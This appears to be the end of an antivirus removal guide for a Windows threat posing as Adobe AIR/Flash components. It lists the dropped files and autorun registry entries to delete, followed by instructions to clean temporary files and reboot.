%System%\Adobe AIR\Versions\1.0\Resources\adobecp.vch (11242 bytes)
%Program Files%\Company\Test\Uninstall.ini (3 bytes)
%System%\Adobe AIR\Versions\1.0\Resources\WebKit.dll (77249 bytes)
%System%\svchost\Adobe AIR\Versions\1.0\Adobe AIR.dll (107182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Adobe AIR[1] (2917624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\main[1].swf (60712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\mimetype[1] (59 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Adobe AIR[1].vch (217004 bytes)
%System%\svchost\mimetype (59 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\svchost[1] (5716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\AdobeCP[1] (1051142 bytes)
%System%\svchost\svchost.exe (59 bytes)
%System%\svchost\main.swf (1673 bytes)
%System%\svchost\Adobe AIR\Versions\1.0\Resources\Adobe AIR.vch (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\signatures[1].xml (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\application[1].xml (1400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\update[1].xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\hash[1] (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\launcher[1].swf (796 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Flash Updater" = "%Documents and Settings%\%current user%\Application Data\svchost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"test" = "%WinDir%\System32\launcher.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.